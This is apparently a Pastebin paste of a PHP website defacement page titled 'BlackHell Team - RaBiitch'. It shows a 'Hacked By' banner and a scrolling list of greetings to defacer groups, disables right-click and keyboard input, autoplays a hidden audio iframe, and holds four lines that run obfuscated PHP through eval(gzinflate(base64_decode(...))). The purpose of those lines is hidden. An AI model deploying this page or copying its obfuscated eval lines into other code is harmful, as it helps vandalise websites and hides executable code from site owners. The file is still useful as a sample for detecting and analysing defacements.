rabyte

rabiitch.php

Jun 29th, 2018
317
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.17 KB | None | 0 0
  1. <html>
  2.     <head>
  3.         <title>BlackHell Team - RaBiitch</title>
  4. <meta name='description' content='We are playing your Sistem' />
  5. <meta name='keywords' content='Hacked By RaBiitch' />
  6. <meta name='author' content='Hacked By RaBiitch' />
  7. <meta name='rating' content='general' />
  8. <meta name='geo.country' content='id' />
  9. <meta name='geo.placename' content='Indonesia' />
  10. <meta name='robots' content='all'/>
  11. <meta name='robots' content='index, follow' />
  12. <meta name='robots schedule' content='auto'/>
  13. <meta name='revisit-after' content='1 days' />
  14. <meta name='googlebot' content='index,follow'/>
  15. <meta name='distribution' content='global'/>
  16. <meta contact='http://facebook.com/rabiitch1945'/>
  17.         <link href="http://fonts.googleapis.com/css?family=Orbitron"
  18. rel="stylesheet" type="text/css" /><script>
  19.             alert("Loading...");
  20.             alert("Just Joke :v");
  21.             jQuery(document).ready(function(){
  22.                 $('h1').mousemove(function(e){
  23.                     var rXP = (e.pageX - this.offsetLeft-$(this).width()/2);
  24.                     var rYP = (e.pageY - this.offsetTop-$(this).height()/2);
  25.                     $('h1').css('text-shadow', +rYP/10+'px '+rXP/80+'px rgba(227,6,19,.8), '+rYP/8+'px '+rXP/60+'px rgba(255,237,0,1), '+rXP/70+'px '+rYP/12+'px rgba(0,159,227,.7)');
  26.                 });
  27.             });
  28.             function typeEffect(element, speed) {
  29.                 var text = $(element).text();
  30.                 $(element).html('');
  31.                 var i = 0;
  32.                 var timer = setInterval(function() {
  33.                     if (i < text.length) {
  34.                         $(element).append(text.charAt(i));
  35.                         i++;
  36.                     } else {
  37.                         clearInterval(timer);
  38.                     }
  39.                 }, speed);
  40.             }
  41.             $( document ).ready(function() {
  42.                 var speed = 75;
  43.                 var delay = $('h1').text().length * speed + speed;
  44.                 typeEffect($('h1'), speed);
  45.                 setTimeout(function(){
  46.                     $('h4').css('display', 'inline-block');
  47.                     typeEffect($('h4'), speed);
  48.             }, delay);
  49.             });
  50.         </script><style type="text/css">
  51. #footer {
  52.   align: center;
  53.   position: fixed;
  54.   background-color: black;
  55.   width: 100%;
  56.   height:16px;
  57.   text-align: left;
  58.   color: white;
  59.   font-family: Courier;
  60.   font-size: 11px;
  61.   z-index:10000;
  62.   bottom:0;
  63. }
  64. #container {
  65.   width:97vw;
  66.   margin:2vw auto;
  67. }
  68. font{
  69.   font-familly:Orbitron;
  70.   text-align:center;
  71.   letter-spacing:1px;
  72.   color:white;
  73.   /*Create overlap*/
  74.  
  75.   margin:0;
  76.   line-height:0;
  77.   /*Animation*/
  78.  
  79.   -webkit-animation: glitch1 2.5s infinite;
  80.  
  81.           animation: glitch1 2.5s infinite;
  82. }
  83.  
  84. font:nth-child(2) {
  85.   color: #67f3da;
  86.   -webkit-animation: glitch2 2.5s infinite;
  87.           animation: glitch2 2.5s infinite;
  88. }
  89.  
  90. font:nth-child(3) {
  91.   color: #f16f6f;
  92.   -webkit-animation: glitch3 2.5s infinite;
  93.           animation: glitch3 2.5s infinite;
  94. }
  95. /*Keyframes*/
  96.  
  97. @-webkit-keyframes glitch1 {
  98.   0% {
  99.     -webkit-transform: none;
  100.             transform: none;
  101.     opacity: 1;
  102.   }
  103.   7% {
  104.     -webkit-transform: skew(-0.5deg, -0.9deg);
  105.             transform: skew(-0.5deg, -0.9deg);
  106.     opacity: 0.75;
  107.   }
  108.   10% {
  109.     -webkit-transform: none;
  110.             transform: none;
  111.     opacity: 1;
  112.   }
  113.   27% {
  114.     -webkit-transform: none;
  115.             transform: none;
  116.     opacity: 1;
  117.   }
  118.   30% {
  119.     -webkit-transform: skew(0.8deg, -0.1deg);
  120.             transform: skew(0.8deg, -0.1deg);
  121.     opacity: 0.75;
  122.   }
  123.   35% {
  124.     -webkit-transform: none;
  125.             transform: none;
  126.     opacity: 1;
  127.   }
  128.   52% {
  129.     -webkit-transform: none;
  130.             transform: none;
  131.     opacity: 1;
  132.   }
  133.   55% {
  134.     -webkit-transform: skew(-1deg, 0.2deg);
  135.             transform: skew(-1deg, 0.2deg);
  136.     opacity: 0.75;
  137.   }
  138.   50% {
  139.     -webkit-transform: none;
  140.             transform: none;
  141.     opacity: 1;
  142.   }
  143.   72% {
  144.     -webkit-transform: none;
  145.             transform: none;
  146.     opacity: 1;
  147.   }
  148.   75% {
  149.     -webkit-transform: skew(0.4deg, 1deg);
  150.             transform: skew(0.4deg, 1deg);
  151.     opacity: 0.75;
  152.   }
  153.   80% {
  154.     -webkit-transform: none;
  155.             transform: none;
  156.     opacity: 1;
  157.   }
  158.   100% {
  159.     -webkit-transform: none;
  160.             transform: none;
  161.     opacity: 1;
  162.   }
  163. }
  164.  
  165. @keyframes glitch1 {
  166.   0% {
  167.     -webkit-transform: none;
  168.             transform: none;
  169.     opacity: 1;
  170.   }
  171.   7% {
  172.     -webkit-transform: skew(-0.5deg, -0.9deg);
  173.             transform: skew(-0.5deg, -0.9deg);
  174.     opacity: 0.75;
  175.   }
  176.   10% {
  177.     -webkit-transform: none;
  178.             transform: none;
  179.     opacity: 1;
  180.   }
  181.   27% {
  182.     -webkit-transform: none;
  183.             transform: none;
  184.     opacity: 1;
  185.   }
  186.   30% {
  187.     -webkit-transform: skew(0.8deg, -0.1deg);
  188.             transform: skew(0.8deg, -0.1deg);
  189.     opacity: 0.75;
  190.   }
  191.   35% {
  192.     -webkit-transform: none;
  193.             transform: none;
  194.     opacity: 1;
  195.   }
  196.   52% {
  197.     -webkit-transform: none;
  198.             transform: none;
  199.     opacity: 1;
  200.   }
  201.   55% {
  202.     -webkit-transform: skew(-1deg, 0.2deg);
  203.             transform: skew(-1deg, 0.2deg);
  204.     opacity: 0.75;
  205.   }
  206.   50% {
  207.     -webkit-transform: none;
  208.             transform: none;
  209.     opacity: 1;
  210.   }
  211.   72% {
  212.     -webkit-transform: none;
  213.             transform: none;
  214.     opacity: 1;
  215.   }
  216.   75% {
  217.     -webkit-transform: skew(0.4deg, 1deg);
  218.             transform: skew(0.4deg, 1deg);
  219.     opacity: 0.75;
  220.   }
  221.   80% {
  222.     -webkit-transform: none;
  223.             transform: none;
  224.     opacity: 1;
  225.   }
  226.   100% {
  227.     -webkit-transform: none;
  228.             transform: none;
  229.     opacity: 1;
  230.   }
  231. }
  232.  
  233. @-webkit-keyframes glitch2 {
  234.   0% {
  235.     -webkit-transform: none;
  236.             transform: none;
  237.     opacity: 0.25;
  238.   }
  239.   7% {
  240.     -webkit-transform: translate(-2px, -3px);
  241.             transform: translate(-2px, -3px);
  242.     opacity: 0.5;
  243.   }
  244.   10% {
  245.     -webkit-transform: none;
  246.             transform: none;
  247.     opacity: 0.25;
  248.   }
  249.   27% {
  250.     -webkit-transform: none;
  251.             transform: none;
  252.     opacity: 0.25;
  253.   }
  254.   30% {
  255.     -webkit-transform: translate(-5px, -2px);
  256.             transform: translate(-5px, -2px);
  257.     opacity: 0.5;
  258.   }
  259.   35% {
  260.     -webkit-transform: none;
  261.             transform: none;
  262.     opacity: 0.25;
  263.   }
  264.   52% {
  265.     -webkit-transform: none;
  266.             transform: none;
  267.     opacity: 0.25;
  268.   }
  269.   55% {
  270.     -webkit-transform: translate(-5px, -1px);
  271.             transform: translate(-5px, -1px);
  272.     opacity: 0.5;
  273.   }
  274.   50% {
  275.     -webkit-transform: none;
  276.             transform: none;
  277.     opacity: 0.25;
  278.   }
  279.   72% {
  280.     -webkit-transform: none;
  281.             transform: none;
  282.     opacity: 0.25;
  283.   }
  284.   75% {
  285.     -webkit-transform: translate(-2px, -6px);
  286.             transform: translate(-2px, -6px);
  287.     opacity: 0.5;
  288.   }
  289.   80% {
  290.     -webkit-transform: none;
  291.             transform: none;
  292.     opacity: 0.25;
  293.   }
  294.   100% {
  295.     -webkit-transform: none;
  296.             transform: none;
  297.     opacity: 0.25;
  298.   }
  299. }
  300.  
  301. @keyframes glitch2 {
  302.   0% {
  303.     -webkit-transform: none;
  304.             transform: none;
  305.     opacity: 0.25;
  306.   }
  307.   7% {
  308.     -webkit-transform: translate(-2px, -3px);
  309.             transform: translate(-2px, -3px);
  310.     opacity: 0.5;
  311.   }
  312.   10% {
  313.     -webkit-transform: none;
  314.             transform: none;
  315.     opacity: 0.25;
  316.   }
  317.   27% {
  318.     -webkit-transform: none;
  319.             transform: none;
  320.     opacity: 0.25;
  321.   }
  322.   30% {
  323.     -webkit-transform: translate(-5px, -2px);
  324.             transform: translate(-5px, -2px);
  325.     opacity: 0.5;
  326.   }
  327.   35% {
  328.     -webkit-transform: none;
  329.             transform: none;
  330.     opacity: 0.25;
  331.   }
  332.   52% {
  333.     -webkit-transform: none;
  334.             transform: none;
  335.     opacity: 0.25;
  336.   }
  337.   55% {
  338.     -webkit-transform: translate(-5px, -1px);
  339.             transform: translate(-5px, -1px);
  340.     opacity: 0.5;
  341.   }
  342.   50% {
  343.     -webkit-transform: none;
  344.             transform: none;
  345.     opacity: 0.25;
  346.   }
  347.   72% {
  348.     -webkit-transform: none;
  349.             transform: none;
  350.     opacity: 0.25;
  351.   }
  352.   75% {
  353.     -webkit-transform: translate(-2px, -6px);
  354.             transform: translate(-2px, -6px);
  355.     opacity: 0.5;
  356.   }
  357.   80% {
  358.     -webkit-transform: none;
  359.             transform: none;
  360.     opacity: 0.25;
  361.   }
  362.   100% {
  363.     -webkit-transform: none;
  364.             transform: none;
  365.     opacity: 0.25;
  366.   }
  367. }
  368. mm
  369. @-webkit-keyframes glitch3 {
  370.   0% {
  371.     -webkit-transform: none;
  372.             transform: none;
  373.     opacity: 0.25;
  374.   }
  375.   7% {
  376.     -webkit-transform: translate(2px, 3px);
  377.             transform: translate(2px, 3px);
  378.     opacity: 0.5;
  379.   }
  380.   10% {
  381.     -webkit-transform: none;
  382.             transform: none;
  383.     opacity: 0.25;
  384.   }
  385.   27% {
  386.     -webkit-transform: none;
  387.             transform: none;
  388.     opacity: 0.25;
  389.   }
  390.   30% {
  391.     -webkit-transform: translate(5px, 2px);
  392.             transform: translate(5px, 2px);
  393.     opacity: 0.5;
  394.   }
  395.   35% {
  396.     -webkit-transform: none;
  397.             transform: none;
  398.     opacity: 0.25;
  399.   }
  400.   52% {
  401.     -webkit-transform: none;
  402.             transform: none;
  403.     opacity: 0.25;
  404.   }
  405.   55% {
  406.     -webkit-transform: translate(5px, 1px);
  407.             transform: translate(5px, 1px);
  408.     opacity: 0.5;
  409.   }
  410.   50% {
  411.     -webkit-transform: none;
  412.             transform: none;
  413.     opacity: 0.25;
  414.   }
  415.   72% {
  416.     -webkit-transform: none;
  417.             transform: none;
  418.     opacity: 0.25;
  419.   }
  420.   75% {
  421.     -webkit-transform: translate(2px, 6px);
  422.             transform: translate(2px, 6px);
  423.     opacity: 0.5;
  424.   }
  425.   80% {
  426.     -webkit-transform: none;
  427.             transform: none;
  428.     opacity: 0.25;
  429.   }
  430.   100% {
  431.     -webkit-transform: none;
  432.             transform: none;
  433.     opacity: 0.25;
  434.   }
  435. }
  436.  
  437. @keyframes glitch3 {
  438.   0% {
  439.     -webkit-transform: none;
  440.             transform: none;
  441.     opacity: 0.25;
  442.   }
  443.   7% {
  444.     -webkit-transform: translate(2px, 3px);
  445.             transform: translate(2px, 3px);
  446.     opacity: 0.5;
  447.   }
  448.   10% {
  449.     -webkit-transform: none;
  450.             transform: none;
  451.     opacity: 0.25;
  452.   }
  453.   27% {
  454.     -webkit-transform: none;
  455.             transform: none;
  456.     opacity: 0.25;
  457.   }
  458.   30% {
  459.     -webkit-transform: translate(5px, 2px);
  460.             transform: translate(5px, 2px);
  461.     opacity: 0.5;
  462.   }
  463.   35% {
  464.     -webkit-transform: none;
  465.             transform: none;
  466.     opacity: 0.25;
  467.   }
  468.   52% {
  469.     -webkit-transform: none;
  470.             transform: none;
  471.     opacity: 0.25;
  472.   }
  473.   55% {
  474.     -webkit-transform: translate(5px, 1px);
  475.             transform: translate(5px, 1px);
  476.     opacity: 0.5;
  477.   }
  478.   50% {
  479.     -webkit-transform: none;
  480.             transform: none;
  481.     opacity: 0.25;
  482.   }
  483.   72% {
  484.     -webkit-transform: none;
  485.             transform: none;
  486.     opacity: 0.25;
  487.   }
  488.   75% {
  489.     -webkit-transform: translate(2px, 6px);
  490.             transform: translate(2px, 6px);
  491.     opacity: 0.5;
  492.   }
  493.   80% {
  494.     -webkit-transform: none;transform: none;opacity: 0.25;}100%
  495. {
  496.     -webkit-transform: none;transform:
  497.          none;opacity: 0.25;
  498.   }
  499.  }
  500.       </style>
  501.    </head>
  502. <?php eval(gzinflate(base64_decode('c0jOL6jUcFCJd/P0cQ2OVq9Qj41WL8ktiM9LzE1Vj9VBk4GIaloDAA=='))); ?>
  503.            <body bgcolor="black" oncontextmenu="return false;"
  504. onkeydown="return false;" onmousedown="return false;"
  505. ondragstart="return false" onselectstart="return
  506. false">
  507.         <iframe width="0" height="0"
  508. scrolling="yes" frameborder="no"
  509. allow="autoplay"
  510. src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/403414851&auto_play=true&hide_related=false&show_comments=false&show_user=true&show_reposts=false&visual=false"></iframe>
  511.                  <center>
  512.                <br />
  513.              <br />
  514.            <br />
  515.          <br />
  516.        <br />
  517. <div id="container"><img src="https://minervagunceleri.files.wordpress.com/2014/08/logo.png"
  518. title="RaBiitch" />
  519.            <br />
  520.          <br />
  521.      <font face="Orbitron" size="7">BlackHell Team
  522. - RaBiitch</font>
  523. <div id='footer'>
  524.     <marquee onmouseout='this.start()' onmouseover='this.stop()' scrollamount='5'>
  525. [!] Say Hello : A999T - NIGHTMARE - F0xBase - Mr.Adewa - Mr.CeRoS404 - RESIS-07 - M4M3N- M3sicth - MR.R29 - androgh0st - PenggilaCroot07 - Kyu_Kazami - HumanTersakiti404 - SCYTHE404_LOL - Mr. XID4pp - Mr.B4YK - ./0px - Mr.¶ENNYW|$E - ./NightBot_404 - /395 - MR.S04X - GuardiaN_ -  ./InisialF - N1ght_pe0ple420 - K4KTU5_id [!]  [!] Special Thanks : Indonesia Defacer Tersakiti Team - BlackHell Team - EZ Team - ExploiterXeroTeam - GopressXploits - www.RaBiitch.ga <font color="red">[!]
  526. </marquee>
  527.  </div>
  528. <?php eval(gzinflate(base64_decode('LY3LCoMwEEX3hf7DEAJGKga6aEHppvgfMg2TGohJMCP5/fro6sLhcK4MOOMLbEwUlMCV471NUxLQiHITdX+9AEjrPMEmbTN+iUcTA1PgrKqJOeVO64SZ6eNCa+KsFyz6bfExPK2p/glevct7oyyOCZTcf6E50odijY+ZTl73Pw=='))); ?>
  529.    <?php eval(gzinflate(base64_decode('LY1BCoMwEEX3hd5hCAEjFbNtK256hG66lBgmNTROghnJ9au2qw+Px/uSzGx6cDEhKWFWjm2akoBGlIuou/MJQDofEDZnm+GNPNhIjMRZVRNzynetk8mMo6fWxlkvpujn63MbH/5a/RO8Bp/3Rlk8Iyi530JzpA/F2RAz/njdfQE='))); ?>
  530.              <br />
  531.            <br />
  532.          <br />
  533.       <?php eval(gzinflate(base64_decode('jY9La8JAEMfvgXyHYRE2lvgolFISBG1NwYN9xNiLyLJNVnfbbBJ2J6Df3k2lYm89Dczv/5iZqkoxKzCgdYtNi+yz3e2EUdWehjDuxzC9CAplm5IfmTCmNvaMfc8hhkoLViqtMOgsF4cWujbHM3F6en+3pI5LwQthAvpUVygqHGTHRkS+h+KAI4m6jCGX3LiEyTp7Hjx0lh62Xy2vNFclTIB+i7xFza2St+PpvtsO81pTpzuwhqP0vQkQidhEoxGBIfTYKkk/knRDz5O9zJYJ3f4hafK+TlYZW6cLunWP9RphecV4KQy6TrJTh994iBq4WbzBrCiMsBYi2ICrcZ6rtOVrlrDZfJ7+9BDYkhi6S4OrX0LfIyl/VApzSUK4rgyB/Cu0H58A'))); ?>
  534.          <font face="Orbitron" size="5">This Pain Is
  535. Wonderful</font>
  536.             </div>
  537.     </body>
  538. </html>
Advertisement
Add Comment
Please, Sign In to add comment